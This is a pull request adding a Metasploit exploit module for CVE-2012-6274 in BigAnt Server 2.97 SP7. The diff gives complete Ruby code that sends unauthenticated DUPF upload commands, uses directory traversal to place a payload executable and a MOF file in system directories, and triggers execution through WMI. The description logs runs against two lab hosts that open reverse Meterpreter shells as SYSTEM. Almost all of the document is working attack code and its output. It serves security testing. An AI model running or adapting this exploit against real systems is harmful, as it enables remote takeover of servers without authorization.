### PR TITLE
Added module for CVE-2012-6274

### DIFF
--- a/modules/exploits/windows/misc/bigant_server_dupf_upload.rb
+++ b/modules/exploits/windows/misc/bigant_server_dupf_upload.rb
@@ -26,7 +26,8 @@ class Metasploit3 < Msf::Exploit::Remote
 
 				The module uses uses the Windows Management Instrumentation service to execute an
 				arbitrary payload on vulnerable installations of BigAnt on Windows XP and 2003. It
-				has been successfully tested on BigAnt Server 2.97 SP7 Windows XP SP3 and 2003 SP2.
+				has been successfully tested on BigAnt Server 2.97 SP7 over Windows XP SP3 and 2003
+				SP2.
 			},
 			'Author' 	 =>
 				[

--- a/modules/exploits/windows/misc/bigant_server_dupf_upload.rb
+++ b/modules/exploits/windows/misc/bigant_server_dupf_upload.rb
@@ -1,0 +1,126 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::Tcp
+	include Msf::Exploit::EXE
+	include Msf::Exploit::WbemExec
+	include Msf::Exploit::FileDropper
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'BigAnt Server DUPF Command Arbitrary File Upload',
+			'Description'    => %q{
+					This exploits an arbitrary file upload vulnerability in BigAnt Server 2.97 SP7.
+				A lack of authentication allows to make unauthenticated file uploads through a DUPF
+				command. Additionally the filename option in the same command can be used to launch
+				a directory traversal attack and achieve arbitrary file upload.
+
+				The module uses uses the Windows Management Instrumentation service to execute an
+				arbitrary payload on vulnerable installations of BigAnt on Windows XP and 2003. It
+				has been successfully tested on BigAnt Server 2.97 SP7 Windows XP SP3 and 2003 SP2.
+			},
+			'Author' 	 =>
+				[
+					'Hamburgers Maccoy', # Vulnerability discovery
+					'juan vazquez'       # Metasploit module
+				],
+			'License'        => MSF_LICENSE,
+			'References'     =>
+				[
+					[ 'CVE', '2012-6274' ],
+					[ 'US-CERT-VU', '990652' ],
+					[ 'BID', '57214' ],
+					[ 'OSVDB', '89342' ]
+				],
+			'Privileged'     => true,
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[ 'BigAnt Server 2.97 SP7', { } ]
+				],
+			'DefaultTarget' => 0,
+			'DefaultOptions'  =>
+				{
+					'WfsDelay' => 10
+				},
+			'DisclosureDate' => 'Jan 09 2013'))
+
+		register_options(
+			[
+				Opt::RPORT(6661),
+				OptInt.new('DEPTH', [true, "Levels to reach base directory", 6])
+			], self.class)
+
+	end
+
+	def upload_file(filename, content)
+
+		random_date = "#{rand_text_numeric(4)}-#{rand_text_numeric(2)}-#{rand_text_numeric(2)} #{rand_text_numeric(2)}:#{rand_text_numeric(2)}:#{rand_text_numeric(2)}"
+
+		dupf = "DUPF 16\n"
+		dupf << "cmdid: 1\n"
+		dupf << "content-length: #{content.length}\n"
+		dupf << "content-type: Appliction/Download\n"
+		dupf << "filename: #{"\\.." * datastore['DEPTH']}\\#{filename}\n"
+		dupf << "modified: #{random_date}\n"
+		dupf << "pclassid: 102\n"
+		dupf << "pobjid: 1\n"
+		dupf << "rootid: 1\n"
+		dupf << "sendcheck: 1\n\n"
+		dupf << content
+
+		print_status("sending DUPF")
+		connect
+		sock.put(dupf)
+		res = sock.get_once
+		disconnect
+		return res
+
+	end
+
+	def exploit
+
+		peer = "#{rhost}:#{rport}"
+
+		# Setup the necessary files to do the wbemexec trick
+		exe_name = rand_text_alpha(rand(10)+5) + '.exe'
+		exe      = generate_payload_exe
+		mof_name = rand_text_alpha(rand(10)+5) + '.mof'
+		mof      = generate_mof(mof_name, exe_name)
+
+		print_status("#{peer} - Sending HTTP ConvertFile Request to upload the exe payload #{exe_name}")
+		res = upload_file("WINDOWS\\system32\\#{exe_name}", exe)
+		if res and res =~ /DUPF/ and res =~ /fileid: (\d+)/
+			print_good("#{peer} - #{exe_name} uploaded successfully")
+		else
+			if res and res =~ /ERR 9/ and res =~ /#{exe_name}/ and res =~ /lasterror: 183/
+				print_error("#{peer} - Upload failed, check the DEPTH option")
+			end
+			fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Failed to upload #{exe_name}")
+		end
+
+		print_status("#{peer} - Sending HTTP ConvertFile Request to upload the mof file #{mof_name}")
+		res = upload_file("WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof)
+		if res and res =~ /DUPF/ and res =~ /fileid: (\d+)/
+			print_good("#{peer} - #{mof_name} uploaded successfully")
+			register_file_for_cleanup(exe_name)
+			register_file_for_cleanup("wbem\\mof\\good\\#{mof_name}")
+		else
+			if res and res =~ /ERR 9/ and res =~ /#{exe_name}/ and res =~ /lasterror: 183/
+				print_error("#{peer} - Upload failed, check the DEPTH option")
+			end
+			fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Failed to upload #{mof_name}")
+		end
+
+	end
+
+end


### PR DESCRIPTION
Tested successfully with BigAnt Server 2.97 SP7 on Windows XP SP3 and Windows 2003 SP2:

```
msf > use exploit/windows/misc/bigant_server_dupf_upload 
msf  exploit(bigant_server_dupf_upload) > reload
[*] Reloading module...
msf  exploit(bigant_server_dupf_upload) > set rhost 192.168.1.147
rhost => 192.168.1.147
msf  exploit(bigant_server_dupf_upload) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.128:4444 
[*] 192.168.1.147:6661 - Sending HTTP ConvertFile Request to upload the exe payload AoPVhzdIhEunLs.exe
[*] sending DUPF
[+] 192.168.1.147:6661 - AoPVhzdIhEunLs.exe uploaded successfully
[*] 192.168.1.147:6661 - Sending HTTP ConvertFile Request to upload the mof file snjWwtKp.mof
[*] sending DUPF
[+] 192.168.1.147:6661 - snjWwtKp.mof uploaded successfully
[*] Sending stage (752128 bytes) to 192.168.1.147
[*] Meterpreter session 7 opened (192.168.1.128:4444 -> 192.168.1.147:1553) at 2013-02-17 20:23:50 +0100
[+] Deleted wbem\mof\good\snjWwtKp.mof
[!] This exploit may require manual cleanup of: AoPVhzdIhEunLs.exe

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.147 - Meterpreter session 7 closed.  Reason: User exit
msf  exploit(bigant_server_dupf_upload) > set rhost 192.168.1.155
rhost => 192.168.1.155
msf  exploit(bigant_server_dupf_upload) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.128:4444 
[*] 192.168.1.155:6661 - Sending HTTP ConvertFile Request to upload the exe payload NSfXgP.exe
[*] sending DUPF
[+] 192.168.1.155:6661 - NSfXgP.exe uploaded successfully
[*] 192.168.1.155:6661 - Sending HTTP ConvertFile Request to upload the mof file UqObJt.mof
[*] sending DUPF
[+] 192.168.1.155:6661 - UqObJt.mof uploaded successfully
[*] Sending stage (752128 bytes) to 192.168.1.155
[*] Meterpreter session 8 opened (192.168.1.128:4444 -> 192.168.1.155:1035) at 2013-02-17 20:24:54 +0100
[+] Deleted wbem\mof\good\UqObJt.mof
[!] This exploit may require manual cleanup of: NSfXgP.exe

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.155 - Meterpreter session 8 closed.  Reason: User exit

```
